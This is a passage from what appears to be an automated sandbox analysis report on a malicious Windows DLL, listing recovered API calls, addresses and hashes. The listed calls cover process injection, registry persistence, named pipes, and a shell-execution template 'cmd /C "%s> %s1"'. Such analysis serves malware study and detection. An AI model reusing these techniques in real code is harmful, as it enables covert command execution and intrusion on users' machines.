  • lstrlenW.KERNEL32(00000000,00000000,00000000,.dll,001C2B1B,00000000,.dll,00000094,00001000,00000000,00000000,00001000), ref: 001D9EB8
  • lstrlen.KERNEL32(DllRegisterServer), ref: 001D9EC6
  • RtlAllocateHeap.NTDLL(00000000,00000022), ref: 001D9EDB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 40
  • API ID: HeapFreeInterlockedExchangeRtlAllocateHeapmemcpywsprintf
  • String ID:
  • API String ID: 3372225998-0
  • Opcode ID: 61e3c6596c7711a58e405f94e11cad7776fca466765ac99ea6157a7d77fb77b6
  • Instruction ID: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
  • Opcode Fuzzy Hash: B6110E75048A40CF89337492402A6BBDA81BD914C798C9763E90C3A5AF4903F29B7F07
  • Instruction Fuzzy Hash: da8d2039801b4c8d43c4b5d75199c0239940cb1666a4492243b1b8028872bfb2
APIs
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001D8FBB: GetLocalTime.KERNEL32(?), ref: 001D8FC5
    • Part of subcall function 001D8FBB: wsprintfA.USER32 ref: 001D8FF1
  • HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
  • wsprintfA.USER32 ref: 001CB04B
  • memcpy.NTDLL(00000000,?,?), ref: 001CB090
  • InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,?,00000000,?,?,?,?,001CD153), ref: 001CBDC4
    • Part of subcall function 001CBD48: memcpy.NTDLL(00000010,00000000,?), ref: 001CBDDF
    • Part of subcall function 001CBD48: CallNamedPipeA.KERNEL32(00000000,?,?,00000010,00000119,00000001), ref: 001CBDFD
    • Part of subcall function 001CBD48: GetLastError.KERNEL32 ref: 001CBE07
    • Part of subcall function 001CBD48: HeapFree.KERNEL32(00000000,00000000), ref: 001CBE2D
    • Part of subcall function 001C5B7B: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
    • Part of subcall function 001C5B7B: memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
    • Part of subcall function 001C5B7B: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
    • Part of subcall function 001C5B7B: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001C5B7B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: HeapFreememcpy$RtlAllocateHeap
  • String ID:
  • API String ID: 1281497405-0
  • Opcode ID: c91cc279de764e5f2579d6076ec579c7e1ff7f10485d5d5ea4a8a547ad6caca9
  • Instruction ID: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
  • Opcode Fuzzy Hash: D1014E13C804C3878807342E9024AB8C449BE822C0DCDD316AA081C13F8BA232B7764F
  • Instruction Fuzzy Hash: 3ae8df9311abcb48d6f96013da2b6f76f4bc533e0507b6b7ad3ca337a4177261
APIs
    • Part of subcall function 001C8692: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C86CC
  • RtlAllocateHeap.NTDLL(00000000,001E5065,?), ref: 001C8BEE
  • memcpy.NTDLL(00000000,00000000,00000000), ref: 001C8C05
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8C18
  • memcpy.NTDLL(00000000,?,?), ref: 001C8C27
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C8C8B
    • Part of subcall function 001D959E: lstrlen.KERNEL32(?,001EAC78,00000000,00000000,001C4C52,00000000,00000000,00000000,00000001,?,?,001CD506,00000000,00000000), ref: 001D95A7
    • Part of subcall function 001D959E: memcpy.NTDLL(00000000,?,00000000,00000001,?,?,001CD506,00000000,00000000,?,?,00000000,001CD6F9), ref: 001D95CA
    • Part of subcall function 001D959E: memset.NTDLL ref: 001D95D9
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RegCloseKeyWaitForSingleObject
  • String ID:
  • API String ID: 3052965740-0
  • Opcode ID: d3c070adaf0f083c3fd626d879ba680c8654bd575e600ed9f9379d1952a7449c
  • Instruction ID: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
  • Opcode Fuzzy Hash: 1B01F521055AD313C12BA88192BA3FA8505BF829E1D4D1737FEB81E18C5F4721E6A707
  • Instruction Fuzzy Hash: ae659000fd8a6ff0622346f66fb9775bf8617b043a7e92e8c3d009521b2ea922
APIs
    • Part of subcall function 001C3BF0: RegCreateKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C05
    • Part of subcall function 001C3BF0: RegOpenKeyA.ADVAPI32(80000001,001EB004,?), ref: 001C3C12
    • Part of subcall function 001C3BF0: lstrlen.KERNEL32(001EB004,00000000,00000000,00000000,?,?,?,001C3C71,00000000,00000000,00000000,00000001,?,?,?,001C4C86), ref: 001C3C33
  • HeapFree.KERNEL32(00000000,?), ref: 001C46AF
  • WaitForSingleObject.KERNEL32(00000000), ref: 001C4713
  • HeapFree.KERNEL32(00000000,?), ref: 001C473C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C474C
  • RegCloseKey.ADVAPI32(?,?,?,00000000,001CB4E0,00000000,00000000,?,001CD6FE), ref: 001C4755
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFree$RtlAllocateHeaplstrlenwsprintf
  • String ID:
  • API String ID: 4063120414-0
  • Opcode ID: 82a566ac4b7e44f40389d82a26e71ca4d0b382ca24f9de814279e5df00d9b999
  • Instruction ID: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
  • Opcode Fuzzy Hash: 10F0F4A4112C418A8C56A6F1989CB7852C85B925FDD4E3313A76C314EB3B13335EBE4D
  • Instruction Fuzzy Hash: ea15a0fccfaea50bf9a426a543ac3d3c6aed45562802de59e2cba04bd230a37d
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
    • Part of subcall function 001C77DE: RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C77DE: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
  • lstrlen.KERNEL32(00000000,001ECDBE,00000000,001ECDAC,00000000,001ECD98,00000000,001ECE3B,00000000,001ECE30,00000000,001ECD88,00000000,00002334), ref: 001C792A
  • RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 001C793F
  • wsprintfA.USER32 ref: 001C7954
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C796E
    • Part of subcall function 001C7664: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001C76B4
    • Part of subcall function 001C7664: GetLastError.KERNEL32(?,00000000,001C797E), ref: 001C76E5
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,00000000), ref: 001C76F7
    • Part of subcall function 001C7664: HeapFree.KERNEL32(00000000,001C797E), ref: 001C770C
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C7998
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: CreateWaitableTimerGetLastErrorGetSystemTimeAsFileTimeHeapFreeOpenWaitableTimer
  • String ID:
  • API String ID: 1165046961-0
  • Opcode ID: dcf0f1391520f43fe6097fd0f752f71d1dc6f160b6cfea933156b7ea3217ac6e
  • Instruction ID: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
  • Opcode Fuzzy Hash: 3BF02BA00A858783E07B64608177BB58300EBC25D5D8C2733F65D5DB5D8F46B1A2FA25
  • Instruction Fuzzy Hash: 47380e5463a91fa5f58a51e79f45711cdea6db2302c913f91e1116e2b5f0794b
APIs
  • OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
  • CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
  • GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C3C55: RegQueryValueExA.KERNEL32(00000000,001CD4DC,00000000,001CD4DC,00000000,?,00000000,00000000,00000000,00000000,00000001,?,?,?,001C4C86,001EC1F9), ref: 001C3C8D
    • Part of subcall function 001C3C55: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C3CA1
    • Part of subcall function 001C3C55: HeapFree.KERNEL32(00000000,?), ref: 001C3CD7
    • Part of subcall function 001C3C55: RegCloseKey.ADVAPI32(00000000,?,?,?,001C4C86,001EC1F9,001CD4DC,00000000,00000000,00000000,00000001,?,?,?,001CD4DC,00000000), ref: 001C3CE5
  • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
  • HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
    • Part of subcall function 001C4349: GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C4356
    • Part of subcall function 001C4349: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 001C4390
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: HeapFreeRtlAllocateHeaplstrcpylstrcpynlstrlen
  • String ID:
  • API String ID: 2577868549-0
  • Opcode ID: 1d80e047f999f10d401b9f46cfff4084342c566a149a0ba19b39b0a0f7985056
  • Instruction ID: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
  • Opcode Fuzzy Hash: C6F08B2B448E429BC027204202A67D8E71CBB818DAC4D8B319884795AE2EC272225B0A
  • Instruction Fuzzy Hash: 2369ec942959bcc0f81c5e1f9b71a5b6904734b35236ac73d6e48e3a05a83d19
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000007), ref: 001C9F8D
  • lstrcpy.KERNEL32(00000000,001EC424), ref: 001C9F9F
  • lstrcpyn.KERNEL32(00000006,?,00000001,?,?,?,?,?,00000000,00000000,?), ref: 001C9FAC
  • lstrlen.KERNEL32(001EC424,?,?,?,?,?,00000000,00000000,?), ref: 001C9FBE
    • Part of subcall function 001CA73F: RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 001CA760
    • Part of subcall function 001CA73F: wsprintfA.USER32 ref: 001CA775
    • Part of subcall function 001CA73F: RegCreateKeyA.ADVAPI32(80000001,001EB240,00000000), ref: 001CA78D
    • Part of subcall function 001CA73F: RegCloseKey.ADVAPI32(?), ref: 001CA7B5
    • Part of subcall function 001CA73F: HeapFree.KERNEL32(00000000,00000000), ref: 001CA7C4
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C9FEF
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 117
  • API ID: GetLastError$CloseHandleReleaseMutexWaitForMultipleObjects
  • String ID:
  • API String ID: 981764843-0
  • Opcode ID: e0028ebea731b05e1f81d164d1b0c22b432d0313b7510209d972350b2e9e1cbf
  • Instruction ID: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
  • Opcode Fuzzy Hash: 63F06276110C810BCE276554A46279A5A106FC23F048C1753FFF66A1EF1B527AD21B8A
  • Instruction Fuzzy Hash: 983f2bdd78a01378a5524cb3713f7215791f28ca6a77dfb9313747591b0c8092
APIs
    • Part of subcall function 001C44A4: OpenMutexA.KERNEL32(00100001,00000000,?), ref: 001C44B0
    • Part of subcall function 001C44A4: SetLastError.KERNEL32(000000B7,?,001C44F5), ref: 001C44C1
    • Part of subcall function 001C44A4: CreateMutexA.KERNEL32(001EB0D8,00000000,?,?,001C44F5), ref: 001C44D4
  • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
  • CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetLastError.KERNEL32 ref: 001C45BC
  • ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
  • GetLastError.KERNEL32 ref: 001C45E0
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: memcpy$HeapFreeRtlAllocateHeaplstrcmpi
  • String ID:
  • API String ID: 857938089-0
  • Opcode ID: 4b4a78c487d6048ee3f3895cdad3a98188a4a88c0ba2f47e4ae26dadc0163ad9
  • Instruction ID: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
  • Opcode Fuzzy Hash: C5F09E214D05C251D61B10B45894B94E946FE823B3C8DA7379C047908B2A4221A9B5EF
  • Instruction Fuzzy Hash: 3f52a085e5dd49b5850e34594fd6f7df3e0d62c374d676f882949c6103c053a0
APIs
    • Part of subcall function 001C57CC: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C57D4
    • Part of subcall function 001C57CC: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C57E9
    • Part of subcall function 001C57CC: InterlockedIncrement.KERNEL32(0000001C), ref: 001C5802
  • RtlAllocateHeap.NTDLL(00000000,?,001ED278), ref: 001CADC5
  • memcpy.NTDLL(00000000,?,?), ref: 001CADD6
    • Part of subcall function 001C5761: InterlockedDecrement.KERNEL32(0000001C), ref: 001C5765
  • lstrcmpi.KERNEL32(00000002,?), ref: 001CAE1C
  • memcpy.NTDLL(00000000,?,?), ref: 001CAE30
  • HeapFree.KERNEL32(00000000,00000000,001ED278), ref: 001CAE6F
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 27
  • API ID: GetSystemTimeAsFileTimeInterlockedIncrementRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSection
  • String ID:
  • API String ID: 2335115045-0
  • Opcode ID: 87b7f9457d6eb4fb8a765cd00379997a4ae998d37287d2c68f8de9ad653ea43e
  • Instruction ID: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
  • Opcode Fuzzy Hash: 73F08BB11645925BD10230500D063B7F90AFBB13EAC4DFE12DD20342AB3F8321266BAC
  • Instruction Fuzzy Hash: a533ae1a33582a8b524e606b503d101fc491c8f586016c526a9c3a1c080ca75d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5A01
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5A14
  • GetSystemTimeAsFileTime.KERNEL32(?), ref: 001C5A25
  • RtlAllocateHeap.NTDLL(00000000,001EB264,?), ref: 001C5A90
  • InterlockedIncrement.KERNEL32(001EB25C), ref: 001C5AA7
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 95
  • API ID: CloseHandleGetLastError$OpenProcess
  • String ID:
  • API String ID: 3618605412-0
  • Opcode ID: f3c28a13a8270d655170a0e3c90d88c5c03aaf1802dd5309b87f7072ec2badc3
  • Instruction ID: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
  • Opcode Fuzzy Hash: 13F09E78181666838027B06098507FBF645FE821CF6AC3610F6603108A47563AD76754
  • Instruction Fuzzy Hash: ee927bb26a947277b8e3b3d91228e1c9832b26c7ffbdb67feee30960427366c3
APIs
    • Part of subcall function 001D8325: GetModuleHandleA.KERNEL32(001EC01D,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D833F
    • Part of subcall function 001D8325: GetProcAddress.KERNEL32(00000000,001EDA66,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D8350
    • Part of subcall function 001D8325: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D836D
    • Part of subcall function 001D8325: IsWow64Process.KERNELBASE(00000000,?,?,?,?,?,001C13BC,00000000,001EB090,00000000,?,?), ref: 001D837E
    • Part of subcall function 001D8325: CloseHandle.KERNEL32(00000000), ref: 001D8391
  • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000001), ref: 001DC517
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC59A
    • Part of subcall function 001DC371: memset.NTDLL ref: 001DC393
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(?,00000000,?,?,00000000,?,00010007,00000004,?), ref: 001DC42A
    • Part of subcall function 001DC371: WaitForSingleObject.KERNEL32(00000064), ref: 001DC438
    • Part of subcall function 001DC371: SuspendThread.KERNEL32(?), ref: 001DC450
    • Part of subcall function 001DC371: GetLastError.KERNEL32(00000000,?,00010007,00000004,?), ref: 001DC4C5
    • Part of subcall function 001DC371: ResumeThread.KERNEL32(00000004), ref: 001DC4D6
  • CloseHandle.KERNEL32(00000000), ref: 001DC592
  • CloseHandle.KERNEL32(?), ref: 001DC5AD
  • GetLastError.KERNEL32(?,?,00000001), ref: 001DC5B5
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 377
  • API ID: CloseHandleCreateFileGetFileSizeGetLastErrorReadFile
  • String ID:
  • API String ID: 1827773359-0
  • Opcode ID: 0e249ffb26827f8de4bdc9f10efd9553abeea1975b9e130743c481de3b32f60c
  • Instruction ID: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
  • Opcode Fuzzy Hash: 80E0C010A20A86DED45B5CA04402F45EF06AF50149D9C3E65B500153674F01736AAB29
  • Instruction Fuzzy Hash: 5daf692a53dad62940b146f0af9ee31aa5a4f052f94ea12f534120e924777b7f
APIs
  • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001D6D36
  • GetFileSize.KERNEL32(00000000,00000000,?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000), ref: 001D6D46
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 001D6D72
  • GetLastError.KERNEL32(?,?,001D6DE7,00000000,001C797E,001C797E,00000000,00000000,00000000,001C767C,001C797E,001C797E,00000000,00000000,00000000), ref: 001D6D97
  • CloseHandle.KERNEL32(000000FF), ref: 001D6DA8
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetLastError$HeapFreeRtlAllocateHeapWaitForSingleObject
  • String ID:
  • API String ID: 1129198028-0
  • Opcode ID: e3a02cbeabdfe4a2cd864ccd1553d94aed3507c904c4d03dee893086ea269868
  • Instruction ID: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
  • Opcode Fuzzy Hash: C7E05C64444FC296C00FB62559903FB5B466F41BD3D4C5623B8042404D3F4633F7296E
  • Instruction Fuzzy Hash: 59916db0f0ba61348a2dee30f2c028260359dd5f044f847590a39ac0bfcd07d8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00004000), ref: 001C84BC
  • GetLastError.KERNEL32 ref: 001C84DF
  • WaitForSingleObject.KERNEL32(?,000000FF), ref: 001C84F2
  • GetLastError.KERNEL32 ref: 001C84FD
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C8545
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 61
  • API ID: CreateDirectoryDeleteFileGetLastErrorHeapFreeRemoveDirectory
  • String ID:
  • API String ID: 4079355387-0
  • Opcode ID: 8c67f55a15a2c5e2e65c1e56377dd64d01b0e2d18364e0ba4940ce76a46808fc
  • Instruction ID: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
  • Opcode Fuzzy Hash: B9E0C9764404804A4CA7D8A9A86C27E458316539E2C0D4335F5793B8A7DEA129BE0F93
  • Instruction Fuzzy Hash: 065d5ed1bcaf4d35961f09f99a339e463c93b1b32b72de6584e4f84f246ea1e5
APIs
    • Part of subcall function 001D7471: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74A9
    • Part of subcall function 001D7471: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,?,001C11C5,000004D2), ref: 001D74B5
    • Part of subcall function 001D7471: GetTempFileNameA.KERNEL32(00000000,00000000,?,00000000), ref: 001D74C3
    • Part of subcall function 001D7471: lstrcpy.KERNEL32(00000000), ref: 001D74DE
  • DeleteFileA.KERNEL32(00000000,000004D2), ref: 001C11D6
  • CreateDirectoryA.KERNEL32(00000000,00000000), ref: 001C11DF
  • GetLastError.KERNEL32 ref: 001C11E9
    • Part of subcall function 001C1000: lstrcpy.KERNEL32(00000000,?), ref: 001C1046
    • Part of subcall function 001C1000: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1115
    • Part of subcall function 001C1000: CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 001C1145
    • Part of subcall function 001C1000: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 001C115E
    • Part of subcall function 001C1000: CloseHandle.KERNEL32(00000000), ref: 001C1168
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C1178
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,00000000), ref: 001C1193
    • Part of subcall function 001C1000: HeapFree.KERNEL32(00000000,?), ref: 001C11A3
    • Part of subcall function 001C771B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 001C775C
    • Part of subcall function 001C771B: lstrlen.KERNEL32(00000000,?,00000000,?,?,001C1255,00000000,00000000,00000004), ref: 001C7774
    • Part of subcall function 001C771B: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C7788
    • Part of subcall function 001C771B: mbstowcs.NTDLL ref: 001C7798
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C77B6
    • Part of subcall function 001C771B: CloseHandle.KERNEL32(?), ref: 001C77C0
    • Part of subcall function 001C771B: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C77CF
  • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000004), ref: 001C125E
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C126D
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetSystemTimeAsFileTimeHeapFreeRtlAllocateHeaplstrlenmemcpy
  • String ID:
  • API String ID: 469818408-0
  • Opcode ID: f1f47f5e13992d98d78fab90320651e280bece1f12eb0609cccb7f77c9a22763
  • Instruction ID: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
  • Opcode Fuzzy Hash: 7DE02629491513D7082B292E5858B3CE612FDF32E650C2373E6002E18B0B8233B55E6F
  • Instruction Fuzzy Hash: fa3c0d327166d11334bf8ce23e920ae80c025fb47fa31180c6216c2e2605688f
APIs
  • GetSystemTimeAsFileTime.KERNEL32(001C77AB,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BAD
  • memcpy.NTDLL(001C77AB,?,00000009,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7BCF
  • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 001C7BE7
  • lstrlenW.KERNEL32(00000000,00000001,001C77AB,?,?,?,?,?,?,?,00000008,001C77AB,00000000,?), ref: 001C7C07
    • Part of subcall function 001C7AF2: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 001C7B06
    • Part of subcall function 001C7AF2: memcpy.NTDLL(00000000,001C7C21,?,?,00000008,?,001C7C21,00000000,00000000,?), ref: 001C7B2F
    • Part of subcall function 001C7AF2: RegCloseKey.ADVAPI32(?,?,001C7C21,00000000,00000000,?,?,?,?,?,?,?,?,00000008,001C77AB,00000000), ref: 001C7B81
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C7C2C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 25
  • API ID: HeapFreeRtlAllocateHeapRtlEnterCriticalSectionRtlLeaveCriticalSectionmemcpy
  • String ID:
  • API String ID: 229461383-0
  • Opcode ID: bbc3c6a859906d8649009038d034178e5739454c1ef541e28150f978055748ba
  • Instruction ID: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
  • Opcode Fuzzy Hash: EDE06870284402D5901B6489BC4AA32FA0BFA813CADCD411BDD613924D3AC305A57B18
  • Instruction Fuzzy Hash: e0ce7683c07fadfa7263f2f5f0c25f91a7575de694d2a60a30204d8eded1361d
APIs
    • Part of subcall function 001DDA6F: lstrlen.KERNEL32(?,001EB160,001E5128,?,001DE5BF,?,00000000,001E5128,00000000,001EB16C,001EB16C,?,001DE11D,?,?,?), ref: 001DDA7B
  • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001C5BA4
  • memcpy.NTDLL(00000000,?,?), ref: 001C5BB7
  • RtlEnterCriticalSection.NTDLL(001EB248), ref: 001C5BC8
  • RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001C5BDD
    • Part of subcall function 001CAE7F: lstrcmpi.KERNEL32(?,001EC4EA), ref: 001CAED6
    • Part of subcall function 001CAE7F: HeapFree.KERNEL32(00000000,00000000,001C5C01), ref: 001CAF03
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001C5C15
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 50
  • API ID: HeapFreeRegCloseKeyRegCreateKeyRtlAllocateHeapwsprintf
  • String ID:
  • API String ID: 3256001470-0
  • Opcode ID: 01f8e3d33e50ea4ec22d448b9311bf29d95033bd0f3209c1f4217f579a1e53db
